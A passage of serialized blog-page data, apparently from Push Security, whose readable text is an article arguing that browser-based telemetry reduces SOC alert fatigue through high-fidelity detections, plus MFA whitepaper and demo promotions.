7,"marks":67098,"value":26492,"nodeType":173},{},[],{"data":67100,"content":67101,"nodeType":178},{},[67102],{"data":67103,"marks":67104,"value":26499,"nodeType":173},{},[],{"data":67106,"content":67107,"nodeType":235},{},[67108],{"data":67109,"marks":67110,"value":26507,"nodeType":173},{},[67111],{"type":370},{"data":67113,"content":67114,"nodeType":178},{},[67115],{"data":67116,"marks":67117,"value":26514,"nodeType":173},{},[],{"data":67119,"content":67120,"nodeType":178},{},[67121],{"data":67122,"marks":67123,"value":26521,"nodeType":173},{},[],{"data":67125,"content":67126,"nodeType":235},{},[67127],{"data":67128,"marks":67129,"value":26529,"nodeType":173},{},[67130],{"type":370},{"data":67132,"content":67133,"nodeType":178},{},[67134],{"data":67135,"marks":67136,"value":26536,"nodeType":173},{},[],{"data":67138,"content":67139,"nodeType":178},{},[67140,67143,67150],{"data":67141,"marks":67142,"value":26543,"nodeType":173},{},[],{"data":67144,"content":67145,"nodeType":186},{"uri":4492},[67146],{"data":67147,"marks":67148,"value":26551,"nodeType":173},{},[67149],{"type":194},{"data":67151,"marks":67152,"value":26555,"nodeType":173},{},[],{"data":67154,"content":67157,"nodeType":312},{"target":67155},{"sys":67156},{"id":26560,"type":317,"linkType":318},[],{"data":67159,"content":67160,"nodeType":231},{},[],{"data":67162,"content":67163,"nodeType":169},{},[67164],{"data":67165,"marks":67166,"value":26572,"nodeType":173},{},[67167],{"type":370},{"data":67169,"content":67170,"nodeType":178},{},[67171],{"data":67172,"marks":67173,"value":26579,"nodeType":173},{},[],{"data":67175,"content":67176,"nodeType":178},{},[67177,67180,67187],{"data":67178,"marks":67179,"value":26586,"nodeType":173},{},[],{"data":67181,"content":67182,"nodeType":186},{"uri":819},[67183],{"data":67184,"marks":67185,"value":26594,"nodeType":173},{},[67186],{"type":194},{"data":67188,"marks":67189,"value":26598,"nodeType":173},{},[],{"data":67191,"content":67192,"nodeType":178},{},[67193],{"data":67194,"marks":67195,"value":26605,"nodeType":173},{},[],{"data":67197,"content":67198,"nodeType":178},{},[67199],{"data":67200,"marks":67201,"value":26612,"nodeType":173},{},[],{"data":67203,"content":67204,"nodeType":231},{},[],{"data":67206,"content":67207,"nodeType":169},{},[67208],{"data":67209,"marks":67210,"value":11718,"nodeType":173},{},[67211],{"type":370},{"data":67213,"content":67214,"nodeType":178},{},[67215],{"data":67216,"marks":67217,"value":26629,"nodeType":173},{},[],{"data":67219,"content":67220,"nodeType":178},{},[67221],{"data":67222,"marks":67223,"value":26636,"nodeType":173},{},[],{"data":67225,"content":67226,"nodeType":178},{},[67227],{"data":67228,"marks":67229,"value":26643,"nodeType":173},{},[],{"data":67231,"content":67232,"nodeType":178},{},[67233],{"data":67234,"marks":67235,"value":26650,"nodeType":173},{},[],{"data":67237,"content":67240,"nodeType":312},{"target":67238},{"sys":67239},{"id":26655,"type":317,"linkType":318},[],{"data":67242,"content":67243,"nodeType":231},{},[],{"data":67245,"content":67246,"nodeType":169},{},[67247],{"data":67248,"marks":67249,"value":18605,"nodeType":173},{},[67250],{"type":370},{"data":67252,"content":67253,"nodeType":178},{},[67254],{"data":67255,"marks":67256,"value":26673,"nodeType":173},{},[],{"data":67258,"content":67259,"nodeType":178},{},[67260,67263,67270,67273,67280],{"data":67261,"marks":67262,"value":1451,"nodeType":173},{},[],{"data":67264,"content":67265,"nodeType":186},{"uri":1456},[67266],{"data":67267,"marks":67268,"value":1459,"nodeType":173},{},[67269],{"type":194},{"data":67271,"marks":67272,"value":1464,"nodeType":173},{},[],{"data":67274,"content":67275,"nodeType":186},{"uri":1469},[67276],{"data":67277,"marks":67278,"value":1472,"nodeType":173},{},[67279],{"type":194},{"data":67281,"marks":67282,"value":1477,"nodeType":173},{},[],{"data":67284,"content":67287,"nodeType":312},{"target":67285},{"sys":67286},{"id":26298,"type":317,"linkType":318},[],{"data":67289,"content":67290,"nodeType":178},{},[67291],{"data":67292,"marks":67293,"value":37,"nodeType":173},{},[],{"entries":67295},{"hyperlink":67296,"inline":67297,"block":67298},[],[],[67299,67303,67318],{"sys":67300,"__typename":15269,"type":15270,"ctaText":67301,"buttonLabel":67302,"buttonColour":15273,"buttonUrl":27851},{"id":26298},"Read our whitepaper for more information on the state of MFA regulation and compliance.","Download Now",{"sys":67304,"__typename":5311,"content":67305,"name":67317,"title":118},{"id":26560},{"json":67306},{"nodeType":165,"data":67307,"content":67308},{},[67309],{"nodeType":178,"data":67310,"content":67311},{},[67312],{"nodeType":173,"value":67313,"marks":67314,"data":67316},"So even if you think you’ve configured MFA for a given app, or that all employees log in via SSO, the reality can be way different. It’s tempting to think of MFA as binary: enabled or not. The reality is that MFA needs to be enabled and validated across every app and login. This is no small task. ",[67315],{"type":370},{},"NYDFS blog insight box 1",{"sys":67319,"__typename":5434,"title":67320,"arcadeDemoUrl":67321,"playText":5437},{"id":26655},"Find and close MFA gaps with Push Security","https://demo.arcade.software/qEDIGb9n7EEPCWFntm56?embed",{"items":67323},[67324,67825,68390],{"__typename":1528,"sys":67325,"content":67327,"title":67811,"synopsis":67812,"hashTags":118,"publishedDate":67813,"slug":67814,"tagsCollection":67815,"authorsCollection":67821},{"id":67326},"6jYmU1ROpwI41mmzk7ioKd",{"json":67328},{"nodeType":165,"data":67329,"content":67330},{},[67331,67338,67345,67348,67355,67389,67401,67426,67433,67436,67443,67450,67457,67463,67470,67500,67506,67513,67533,67539,67546,67552,67555,67562,67598,67605,67648,67655,67661,67668,67675,67678,67685,67692,67699,67718,67724,67731,67738,67745,67751,67758,67764,67767,67773,67780,67787],{"nodeType":178,"data":67332,"content":67333},{},[67334],{"nodeType":173,"value":67335,"marks":67336,"data":67337},"After more than two decades in cybersecurity, I’ve witnessed the evolution (and at times, devolution) of detection and response capabilities. I’ve sat in countless SOCs watching analysts drown in a sea of alerts, spent hours chasing false positives, and seen talented security professionals burn out from the relentless noise of low-fidelity detection systems. ",[],{},{"nodeType":178,"data":67339,"content":67340},{},[67341],{"nodeType":173,"value":67342,"marks":67343,"data":67344},"It’s a problem that’s reached crisis proportions, and it’s exactly why our approach to browser security represents not just a technological shift, but a philosophical one.",[],{},{"nodeType":231,"data":67346,"content":67347},{},[],{"nodeType":169,"data":67349,"content":67350},{},[67351],{"nodeType":173,"value":67352,"marks":67353,"data":67354},"The alert fatigue epidemic",[],{},{"nodeType":178,"data":67356,"content":67357},{},[67358,67362,67367,67371,67376,67380,67385],{"nodeType":173,"value":67359,"marks":67360,"data":67361},"Early in my career, getting ",[],{},{"nodeType":173,"value":67363,"marks":67364,"data":67366},"any",[67365],{"type":1646},{},{"nodeType":173,"value":67368,"marks":67369,"data":67370}," alert felt like a victory. We were flying blind outside of our small windows of network traffic. But as the industry matured, something troubling happened: we began equating ",[],{},{"nodeType":173,"value":67372,"marks":67373,"data":67375},"volume",[67374],{"type":370},{},{"nodeType":173,"value":67377,"marks":67378,"data":67379}," with ",[],{},{"nodeType":173,"value":67381,"marks":67382,"data":67384},"value",[67383],{"type":370},{},{"nodeType":173,"value":67386,"marks":67387,"data":67388},". Vendors started competing on how many alerts they could generate, how much data they could collect, and how comprehensive their “visibility” could be. ",[],{},{"nodeType":178,"data":67390,"content":67391},{},[67392,67396],{"nodeType":173,"value":67393,"marks":67394,"data":67395},"Security teams followed suit with operational metrics that captured how many alerts they’d resolved, how many “attacks” they’d stopped, and how many tickets they’d opened and closed in a given work cycle. But as many teams have now realized, ",[],{},{"nodeType":173,"value":67397,"marks":67398,"data":67400},"volume is a vanity metric; fidelity is what keeps you safe.",[67399],{"type":370},{},{"nodeType":178,"data":67402,"content":67403},{},[67404,67408,67417,67421],{"nodeType":173,"value":67405,"marks":67406,"data":67407},"In my course on ",[],{},{"nodeType":186,"data":67409,"content":67411},{"uri":67410},"https://www.sans.org/cyber-security-courses/building-leading-security-operations-centers",[67412],{"nodeType":173,"value":67413,"marks":67414,"data":67416},"Building and Leading Security Operations teams",[67415],{"type":194},{},{"nodeType":173,"value":67418,"marks":67419,"data":67420},", we discuss the importance of analytic outcomes and addressing ineffective alerts to continuously improve fidelity. My students often find it hard to believe how much time and effort it takes to audit alert quality and implement continuous improvements on a large scale. This isn’t just an operational problem — it’s an existential threat to effective security. ",[],{},{"nodeType":173,"value":67422,"marks":67423,"data":67425},"When everything is an alert, nothing is. ",[67424],{"type":370},{},{"nodeType":178,"data":67427,"content":67428},{},[67429],{"nodeType":173,"value":67430,"marks":67431,"data":67432},"And while we have been busy focusing on more (and occasionally, better) detections at the endpoint and network layers, attackers have shifted to infrastructure that isn’t as well-instrumented: SaaS and the browser.",[],{},{"nodeType":231,"data":67434,"content":67435},{},[],{"nodeType":169,"data":67437,"content":67438},{},[67439],{"nodeType":173,"value":67440,"marks":67441,"data":67442},"The browser: a new frontier in detection and response",[],{},{"nodeType":178,"data":67444,"content":67445},{},[67446],{"nodeType":173,"value":67447,"marks":67448,"data":67449},"Today, the browser is the place where most cyber attacks happen. It’s where users interact with the applications that your business runs on, handle sensitive data, and unfortunately, where they encounter sophisticated phishing campaigns, credential harvesting attacks, and malicious downloads. ",[],{},{"nodeType":178,"data":67451,"content":67452},{},[67453],{"nodeType":173,"value":67454,"marks":67455,"data":67456},"Yet for most security teams, the browser remains a black box, obscured from the view from the network and the endpoint. Even worse, attack models often applied to detection engineering for endpoint or network-centric threats don’t really apply; modern identity attacks skip entire phases of the attack chain, eliminating many detection opportunities along the way. The modern attack path doesn’t need to touch the endpoint or your network at all — it can happen entirely over the internet. ",[],{},{"nodeType":312,"data":67458,"content":67462},{"target":67459},{"sys":67460},{"id":67461,"type":317,"linkType":318},"4wYYgbKmmVAZTF7niXJEGc",[],{"nodeType":235,"data":67464,"content":67465},{},[67466],{"nodeType":173,"value":67467,"marks":67468,"data":67469},"Attackers are exploiting the detection gap",[],{},{"nodeType":178,"data":67471,"content":67472},{},[67473,67477,67484,67488,67496],{"nodeType":173,"value":67474,"marks":67475,"data":67476},"You only need to look at in-the-wild breaches such as last year’s ",[],{},{"nodeType":186,"data":67478,"content":67479},{"uri":819},[67480],{"nodeType":173,"value":27706,"marks":67481,"data":67483},[67482],{"type":194},{},{"nodeType":173,"value":67485,"marks":67486,"data":67487}," attacks, or the recent ",[],{},{"nodeType":186,"data":67489,"content":67490},{"uri":598},[67491],{"nodeType":173,"value":67492,"marks":67493,"data":67495},"Salesforce",[67494],{"type":194},{},{"nodeType":173,"value":67497,"marks":67498,"data":67499}," breaches to see the impact that attackers can have by executing attacks entirely over the internet, without touching traditional network devices or user endpoints. ",[],{},{"nodeType":312,"data":67501,"content":67505},{"target":67502},{"sys":67503},{"id":67504,"type":317,"linkType":318},"VfTps3SGKJDlhFcmh42d9",[],{"nodeType":178,"data":67507,"content":67508},{},[67509],{"nodeType":173,"value":67510,"marks":67511,"data":67512},"But even in the context of more “conventional” attacks (e.g. the classic route of compromising an endpoint, moving laterally through an environment, taking control of a domain, and deploying ransomware), most of the time, these attacks begin in the browser with identities and cloud apps rather than exploit-driven initial access — such as with the recent attacks on Marks & Spencer, Co-op, and Jaguar Land Rover. ",[],{},{"nodeType":178,"data":67514,"content":67515},{},[67516,67520,67529],{"nodeType":173,"value":67517,"marks":67518,"data":67519},"While the ",[],{},{"nodeType":186,"data":67521,"content":67523},{"uri":67522},"https://cloud.google.com/security/resources/insights/targeted-attack-lifecycle",[67524],{"nodeType":173,"value":67525,"marks":67526,"data":67528},"attack cycle",[67527],{"type":194},{},{"nodeType":173,"value":67530,"marks":67531,"data":67532}," and similar mental models are valuable for planning in-depth detections of sophisticated, multi-stage attacks, focusing too heavily on them can lead to overlooked scenarios. These high-profile incidents have demonstrated the opportunity cost of neglecting visibility into attacks that don't perfectly align with these models. ",[],{},{"nodeType":312,"data":67534,"content":67538},{"target":67535},{"sys":67536},{"id":67537,"type":317,"linkType":318},"3TsKtoWuxQMFl1xd3w1j86",[],{"nodeType":178,"data":67540,"content":67541},{},[67542],{"nodeType":173,"value":67543,"marks":67544,"data":67545},"Just as endpoint detection and response revolutionized host-based security by providing visibility and control directly at the point of attack, browser-based security platforms can do the same for web-borne threats. It’s an important addition to the detection and response stack that illuminates a “missing middle” in modern attack investigations, and intervenes in real time, much like traditional EDR did for the endpoint years ago.",[],{},{"nodeType":312,"data":67547,"content":67551},{"target":67548},{"sys":67549},{"id":67550,"type":317,"linkType":318},"1eCXGC6U6SdzHmOH1gv24O",[],{"nodeType":231,"data":67553,"content":67554},{},[],{"nodeType":169,"data":67556,"content":67557},{},[67558],{"nodeType":173,"value":67559,"marks":67560,"data":67561},"High-fidelity detection: quality over quantity",[],{},{"nodeType":178,"data":67563,"content":67564},{},[67565,67569,67576,67580,67585,67589,67594],{"nodeType":173,"value":67566,"marks":67567,"data":67568},"Our ",[],{},{"nodeType":186,"data":67570,"content":67571},{"uri":188},[67572],{"nodeType":173,"value":67573,"marks":67574,"data":67575},"design philosophy",[],{},{"nodeType":173,"value":67577,"marks":67578,"data":67579}," centers on a principle often overlooked in the security industry: prioritizing actionable problems for security teams. This involves differentiating between \"",[],{},{"nodeType":173,"value":67581,"marks":67582,"data":67584},"events",[67583],{"type":370},{},{"nodeType":173,"value":67586,"marks":67587,"data":67588},"\" – environment data that may or may not be useful – and \"",[],{},{"nodeType":173,"value":67590,"marks":67591,"data":67593},"detections",[67592],{"type":370},{},{"nodeType":173,"value":67595,"marks":67596,"data":67597},"\" – high-fidelity, actionable signals with a negligible false positive rate. We also empower our customers with the ability to intervene in real-time when there are high-confidence indicators of an attack. We focus on detecting not atomic indicators, but on attacker tooling and behaviors.",[],{},{"nodeType":178,"data":67599,"content":67600},{},[67601],{"nodeType":173,"value":67602,"marks":67603,"data":67604},"Compare this to traditional approaches that might generate alerts for:",[],{},{"nodeType":250,"data":67606,"content":67607},{},[67608,67618,67628,67638],{"nodeType":254,"data":67609,"content":67610},{},[67611],{"nodeType":178,"data":67612,"content":67613},{},[67614],{"nodeType":173,"value":67615,"marks":67616,"data":67617},"Visiting domains with low reputation scores (but not necessarily malicious)",[],{},{"nodeType":254,"data":67619,"content":67620},{},[67621],{"nodeType":178,"data":67622,"content":67623},{},[67624],{"nodeType":173,"value":67625,"marks":67626,"data":67627},"Downloading files that match certain heuristics (but may be legitimate)",[],{},{"nodeType":254,"data":67629,"content":67630},{},[67631],{"nodeType":178,"data":67632,"content":67633},{},[67634],{"nodeType":173,"value":67635,"marks":67636,"data":67637},"Accessing new web applications (that may be approved, or tacitly allowed, shadow IT)",[],{},{"nodeType":254,"data":67639,"content":67640},{},[67641],{"nodeType":178,"data":67642,"content":67643},{},[67644],{"nodeType":173,"value":67645,"marks":67646,"data":67647},"Employee usernames, passwords, and email addresses for sale on the dark web (which may no longer be valid)",[],{},{"nodeType":178,"data":67649,"content":67650},{},[67651],{"nodeType":173,"value":67652,"marks":67653,"data":67654},"These low-fidelity alerts create work without providing solutions. They force analysts to become investigators rather than responders, spending precious time determining whether an alert represents a genuine threat rather than focusing on mitigation and recovery. ",[],{},{"nodeType":312,"data":67656,"content":67660},{"target":67657},{"sys":67658},{"id":67659,"type":317,"linkType":318},"4MydcqvHnWsziCOPUNC3YS",[],{"nodeType":178,"data":67662,"content":67663},{},[67664],{"nodeType":173,"value":67665,"marks":67666,"data":67667},"Poor quality detections also present an easy opportunity for security teams to commit a cardinal sin: disrupting users and business processes without a clear justification for doing so. User trust and support should always be treated as a finite resource, and every account locked, website blocked, and laptop reimaged chips away at that resource. ",[],{},{"nodeType":178,"data":67669,"content":67670},{},[67671],{"nodeType":173,"value":67672,"marks":67673,"data":67674},"Likewise, the more disruptive, the more likely users will look for ways around said controls. If your users are actively working against you, and feel you are preventing them from doing their jobs, they’ll always find new and unexpected ways around security blocks. ",[],{},{"nodeType":231,"data":67676,"content":67677},{},[],{"nodeType":169,"data":67679,"content":67680},{},[67681],{"nodeType":173,"value":67682,"marks":67683,"data":67684},"The SOC analyst's perspective",[],{},{"nodeType":178,"data":67686,"content":67687},{},[67688],{"nodeType":173,"value":67689,"marks":67690,"data":67691},"The most successful SOC analysts share a common trait: they’re extraordinarily good at quickly distinguishing signal from noise. But this skill shouldn’t be required! It’s a failure of our detection systems that we’re forcing human analysts to perform pattern matching that our technology should handle. ",[],{},{"nodeType":178,"data":67693,"content":67694},{},[67695],{"nodeType":173,"value":67696,"marks":67697,"data":67698},"But even for the most skilled analyst, it’s a tall order to ask your security team to also be experts in every cloud app your business relies on, making it even harder than normal to build context-driven alerts. Most of the time, the information required simply doesn't exist, with logs simply not available (generally, or at your product tier) or the work required to extract the logs and turn them into context-driven alerts hasn’t happened yet. If your team is under-resourced and drowning in low-fidelity alerts already, then realistically it might never happen. ",[],{},{"nodeType":178,"data":67700,"content":67701},{},[67702,67706,67714],{"nodeType":173,"value":67703,"marks":67704,"data":67705},"Effective browser security changes this dynamic. Instead of presenting analysts with hundreds of “suspicious web activity” alerts that require investigation, ",[],{},{"nodeType":186,"data":67707,"content":67708},{"uri":9120},[67709],{"nodeType":173,"value":67710,"marks":67711,"data":67713},"our platform focuses on high-reliability indicators",[67712],{"type":194},{},{"nodeType":173,"value":67715,"marks":67716,"data":67717}," like whether a phishing kit was observed running on the page, or whether the page was cloned from a legitimate site. We even detect user behaviors that could indicate a risk in the context of a phishing attack, like when a user attempts to authenticate with credentials that have been previously used on another page — either a sign of credential reuse (bad) or a phishing attack (even worse) — at which point Push can be set to block the attack in real time. ",[],{},{"nodeType":312,"data":67719,"content":67723},{"target":67720},{"sys":67721},{"id":67722,"type":317,"linkType":318},"3998Iy2kp9MW0HFeqmo900",[],{"nodeType":235,"data":67725,"content":67726},{},[67727],{"nodeType":173,"value":67728,"marks":67729,"data":67730},"Browser security provides a new layer of protection, reducing the risk of breach",[],{},{"nodeType":178,"data":67732,"content":67733},{},[67734],{"nodeType":173,"value":67735,"marks":67736,"data":67737},"Attack detection has always been a cat-and-mouse game. For years, attackers have grappled with endpoint and network security vendors. And sometimes, the attackers win. The fact is that a lot of attacker innovation has gone into sandbox aware malware, breaking detection signatures, disabling security tools, and so on.    ",[],{},{"nodeType":178,"data":67739,"content":67740},{},[67741],{"nodeType":173,"value":67742,"marks":67743,"data":67744},"But with so many attacks now passing through the browser, defending it enables badness to be filtered out before it reaches the endpoint or network controls that attackers are looking to consciously evade. By preventing malware being delivered, or identities from being compromised, attacks otherwise crafted to evade traditional security controls can be intercepted early — making the crucial difference in whether a breach happens or not.",[],{},{"nodeType":312,"data":67746,"content":67750},{"target":67747},{"sys":67748},{"id":67749,"type":317,"linkType":318},"4Bh7uOkeguNJFmJ1XUQ317",[],{"nodeType":178,"data":67752,"content":67753},{},[67754],{"nodeType":173,"value":67755,"marks":67756,"data":67757},"And when it comes to the cloud-centric attacks that attackers are finding so much success with today, this is in effect a net new capability. ",[],{},{"nodeType":312,"data":67759,"content":67763},{"target":67760},{"sys":67761},{"id":67762,"type":317,"linkType":318},"4JdaY8I3f6Ub2Kifc9Rsj9",[],{"nodeType":231,"data":67765,"content":67766},{},[],{"nodeType":169,"data":67768,"content":67769},{},[67770],{"nodeType":173,"value":20431,"marks":67771,"data":67772},[],{},{"nodeType":178,"data":67774,"content":67775},{},[67776],{"nodeType":173,"value":67777,"marks":67778,"data":67779},"The browser represents one of the most significant opportunities in cybersecurity today. As we continue to expand our browser-based security capabilities, we remain committed to this high-fidelity approach. We’re building features that not only detect and prevent attacks but also provide security teams with the rich telemetry they need to develop custom queries and detections.",[],{},{"nodeType":178,"data":67781,"content":67782},{},[67783],{"nodeType":173,"value":67784,"marks":67785,"data":67786},"Push Security’s browser-based security platform provides comprehensive detection and response capabilities against techniques like AiTM phishing, credential stuffing, ClickFixing, malicious browser extensions, and session hijacking using stolen session tokens. You can also use Push to find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, risky OAuth integrations, and more to harden your identity attack surface.",[],{},{"nodeType":178,"data":67788,"content":67789},{},[67790,67793,67799,67802,67808],{"nodeType":173,"value":1451,"marks":67791,"data":67792},[],{},{"nodeType":186,"data":67794,"content":67795},{"uri":1456},[67796],{"nodeType":173,"value":1459,"marks":67797,"data":67798},[],{},{"nodeType":173,"value":1464,"marks":67800,"data":67801},[],{},{"nodeType":186,"data":67803,"content":67804},{"uri":1469},[67805],{"nodeType":173,"value":1472,"marks":67806,"data":67807},[],{},{"nodeType":173,"value":1477,"marks":67809,"data":67810},[],{},"Fixing SecOps alert fatigue with browser telemetry","How browser data can improve detection fidelity and reduce alert fatigue, enabling SecOps teams to save time and detect more attacks.","2025-10-07T00:00:00.000Z","fixing-secops-alert-fatigue-with-browser-telemetry",{"items":67816},[67817,67819],{"sys":67818,"name":509},{"id":508},{"sys":67820,"name":505},{"id":504},{"items":67822},[67823],{"fullName":26724,"firstName":26725,"jobTitle":26726,"profilePicture":67824},{"url":26728},{"__typename":1528,"sys":67826,"content":67827,"title":60690,"synopsis":60691,"hashTags":118,"publishedDate":60692,"slug":60693,"tagsCollection":68380,"authorsCollection":68386},{"id":60053},{"json":67828},{"data":67829,"content":67830,"nodeType":165},{},[67831,67844,67850,67853,67860,67866,67872,67888,67893,67899,67905,67911,67917,67920,67927,67933,67938,67944,67951,67957,67963,67968,67984,67989,67995,68001,68007,68012,68015,68022,68038,68044,68070,68076,68082,68087,68093,68099,68105,68108,68115,68130,68135,68141,68147,68152,68158,68164,68167,68174,68180,68196,68232,68238,68244,68250,68253,68260,68266,68272,68278,68281,68288,68294,68320,68336,68342,68345,68352,68358,68364],{"data":67832,"content":67833,"nodeType":178},{},[67834,67837,67841],{"data":67835,"marks":67836,"value":60064,"nodeType":173},{},[],{"data":67838,"marks":67839,"value":60069,"nodeType":173},{},[67840],{"type":1646},{"data":67842,"marks":67843,"value":60073,"nodeType":173},{},[],{"data":67845,"content":67846,"nodeType":178},{},[67847],{"data":67848,"marks":67849,"value":60080,"nodeType":173},{},[],{"data":67851,"content":67852,"nodeType":231},{},[],{"data":67854,"content":67855,"nodeType":169},{},[67856],{"data":67857,"marks":67858,"value":60091,"nodeType":173},{},[67859],{"type":370},{"data":67861,"content":67862,"nodeType":178},{},[67863],{"data":67864,"marks":67865,"value":60098,"nodeType":173},{},[],{"data":67867,"content":67868,"nodeType":178},{},[67869],{"data":67870,"marks":67871,"value":60105,"nodeType":173},{},[],{"data":67873,"content":67874,"nodeType":178},{},[67875,67878,67885],{"data":67876,"marks":67877,"value":60112,"nodeType":173},{},[],{"data":67879,"content":67880,"nodeType":186},{"uri":60115},[67881],{"data":67882,"marks":67883,"value":27706,"nodeType":173},{},[67884],{"type":194},{"data":67886,"marks":67887,"value":60124,"nodeType":173},{},[],{"data":67889,"content":67892,"nodeType":312},{"target":67890},{"sys":67891},{"id":60129,"type":317,"linkType":318},[],{"data":67894,"content":67895,"nodeType":178},{},[67896],{"data":67897,"marks":67898,"value":60137,"nodeType":173},{},[],{"data":67900,"content":67901,"nodeType":178},{},[67902],{"data":67903,"marks":67904,"value":60144,"nodeType":173},{},[],{"data":67906,"content":67907,"nodeType":178},{},[67908],{"data":67909,"marks":67910,"value":60151,"nodeType":173},{},[],{"data":67912,"content":67913,"nodeType":178},{},[67914],{"data":67915,"marks":67916,"value":60158,"nodeType":173},{},[],{"data":67918,"content":67919,"nodeType":231},{},[],{"data":67921,"content":67922,"nodeType":169},{},[67923],{"data":67924,"marks":67925,"value":60169,"nodeType":173},{},[67926],{"type":370},{"data":67928,"content":67929,"nodeType":178},{},[67930],{"data":67931,"marks":67932,"value":60176,"nodeType":173},{},[],{"data":67934,"content":67937,"nodeType":312},{"target":67935},{"sys":67936},{"id":27196,"type":317,"linkType":318},[],{"data":67939,"content":67940,"nodeType":178},{},[67941],{"data":67942,"marks":67943,"value":60188,"nodeType":173},{},[],{"data":67945,"content":67946,"nodeType":235},{},[67947],{"data":67948,"marks":67949,"value":60196,"nodeType":173},{},[67950],{"type":370},{"data":67952,"content":67953,"nodeType":178},{},[67954],{"data":67955,"marks":67956,"value":60203,"nodeType":173},{},[],{"data":67958,"content":67959,"nodeType":178},{},[67960],{"data":67961,"marks":67962,"value":60210,"nodeType":173},{},[],{"data":67964,"content":67967,"nodeType":312},{"target":67965},{"sys":67966},{"id":60215,"type":317,"linkType":318},[],{"data":67969,"content":67970,"nodeType":178},{},[67971,67974,67981],{"data":67972,"marks":67973,"value":60223,"nodeType":173},{},[],{"data":67975,"content":67976,"nodeType":186},{"uri":60226},[67977],{"data":67978,"marks":67979,"value":39789,"nodeType":173},{},[67980],{"type":194},{"data":67982,"marks":67983,"value":60235,"nodeType":173},{},[],{"data":67985,"content":67988,"nodeType":312},{"target":67986},{"sys":67987},{"id":60240,"type":317,"linkType":318},[],{"data":67990,"content":67991,"nodeType":178},{},[67992],{"data":67993,"marks":67994,"value":60248,"nodeType":173},{},[],{"data":67996,"content":67997,"nodeType":178},{},[67998],{"data":67999,"marks":68000,"value":21384,"nodeType":173},{},[],{"data":68002,"content":68003,"nodeType":178},{},[68004],{"data":68005,"marks":68006,"value":60261,"nodeType":173},{},[],{"data":68008,"content":68011,"nodeType":312},{"target":68009},{"sys":68010},{"id":60266,"type":317,"linkType":318},[],{"data":68013,"content":68014,"nodeType":231},{},[],{"data":68016,"content":68017,"nodeType":235},{},[68018],{"data":68019,"marks":68020,"value":60278,"nodeType":173},{},[68021],{"type":370},{"data":68023,"content":68024,"nodeType":178},{},[68025,68028,68035],{"data":68026,"marks":68027,"value":21114,"nodeType":173},{},[],{"data":68029,"content":68030,"nodeType":186},{"uri":21119},[68031],{"data":68032,"marks":68033,"value":1845,"nodeType":173},{},[68034],{"type":194},{"data":68036,"marks":68037,"value":197,"nodeType":173},{},[],{"data":68039,"content":68040,"nodeType":178},{},[68041],{"data":68042,"marks":68043,"value":60301,"nodeType":173},{},[],{"data":68045,"content":68046,"nodeType":178},{},[68047,68050,68057,68060,68067],{"data":68048,"marks":68049,"value":60308,"nodeType":173},{},[],{"data":68051,"content":68052,"nodeType":186},{"uri":21280},[68053],{"data":68054,"marks":68055,"value":21283,"nodeType":173},{},[68056],{"type":194},{"data":68058,"marks":68059,"value":60319,"nodeType":173},{},[],{"data":68061,"content":68062,"nodeType":186},{"uri":60322},[68063],{"data":68064,"marks":68065,"value":60328,"nodeType":173},{},[68066],{"type":194},{"data":68068,"marks":68069,"value":1477,"nodeType":173},{},[],{"data":68071,"content":68072,"nodeType":178},{},[68073],{"data":68074,"marks":68075,"value":60338,"nodeType":173},{},[],{"data":68077,"content":68078,"nodeType":178},{},[68079],{"data":68080,"marks":68081,"value":60345,"nodeType":173},{},[],{"data":68083,"content":68086,"nodeType":312},{"target":68084},{"sys":68085},{"id":60350,"type":317,"linkType":318},[],{"data":68088,"content":68089,"nodeType":178},{},[68090],{"data":68091,"marks":68092,"value":60358,"nodeType":173},{},[],{"data":68094,"content":68095,"nodeType":178},{},[68096],{"data":68097,"marks":68098,"value":60365,"nodeType":173},{},[],{"data":68100,"content":68101,"nodeType":178},{},[68102],{"data":68103,"marks":68104,"value":60372,"nodeType":173},{},[],{"data":68106,"content":68107,"nodeType":231},{},[],{"data":68109,"content":68110,"nodeType":235},{},[68111],{"data":68112,"marks":68113,"value":60383,"nodeType":173},{},[68114],{"type":370},{"data":68116,"content":68117,"nodeType":178},{},[68118,68121,68127],{"data":68119,"marks":68120,"value":60390,"nodeType":173},{},[],{"data":68122,"content":68123,"nodeType":186},{"uri":19838},[68124],{"data":68125,"marks":68126,"value":8091,"nodeType":173},{},[],{"data":68128,"marks":68129,"value":2340,"nodeType":173},{},[],{"data":68131,"content":68134,"nodeType":312},{"target":68132},{"sys":68133},{"id":60404,"type":317,"linkType":318},[],{"data":68136,"content":68137,"nodeType":178},{},[68138],{"data":68139,"marks":68140,"value":60412,"nodeType":173},{},[],{"data":68142,"content":68143,"nodeType":178},{},[68144],{"data":68145,"marks":68146,"value":60419,"nodeType":173},{},[],{"data":68148,"content":68151,"nodeType":312},{"target":68149},{"sys":68150},{"id":60424,"type":317,"linkType":318},[],{"data":68153,"content":68154,"nodeType":178},{},[68155],{"data":68156,"marks":68157,"value":60432,"nodeType":173},{},[],{"data":68159,"content":68160,"nodeType":178},{},[68161],{"data":68162,"marks":68163,"value":60439,"nodeType":173},{},[],{"data":68165,"content":68166,"nodeType":231},{},[],{"data":68168,"content":68169,"nodeType":235},{},[68170],{"data":68171,"marks":68172,"value":60450,"nodeType":173},{},[68173],{"type":370},{"data":68175,"content":68176,"nodeType":178},{},[68177],{"data":68178,"marks":68179,"value":60457,"nodeType":173},{},[],{"data":68181,"content":68182,"nodeType":178},{},[68183,68186,68193],{"data":68184,"marks":68185,"value":60464,"nodeType":173},{},[],{"data":68187,"content":68188,"nodeType":186},{"uri":60467},[68189],{"data":68190,"marks":68191,"value":60473,"nodeType":173},{},[68192],{"type":194},{"data":68194,"marks":68195,"value":60477,"nodeType":173},{},[],{"data":68197,"content":68198,"nodeType":178},{},[68199,68202,68209,68212,68219,68222,68229],{"data":68200,"marks":68201,"value":60484,"nodeType":173},{},[],{"data":68203,"content":68204,"nodeType":186},{"uri":60487},[68205],{"data":68206,"marks":68207,"value":60493,"nodeType":173},{},[68208],{"type":194},{"data":68210,"marks":68211,"value":60497,"nodeType":173},{},[],{"data":68213,"content":68214,"nodeType":186},{"uri":60500},[68215],{"data":68216,"marks":68217,"value":60506,"nodeType":173},{},[68218],{"type":194},{"data":68220,"marks":68221,"value":9534,"nodeType":173},{},[],{"data":68223,"content":68224,"nodeType":186},{"uri":60512},[68225],{"data":68226,"marks":68227,"value":60518,"nodeType":173},{},[68228],{"type":194},{"data":68230,"marks":68231,"value":1477,"nodeType":173},{},[],{"data":68233,"content":68234,"nodeType":178},{},[68235],{"data":68236,"marks":68237,"value":60528,"nodeType":173},{},[],{"data":68239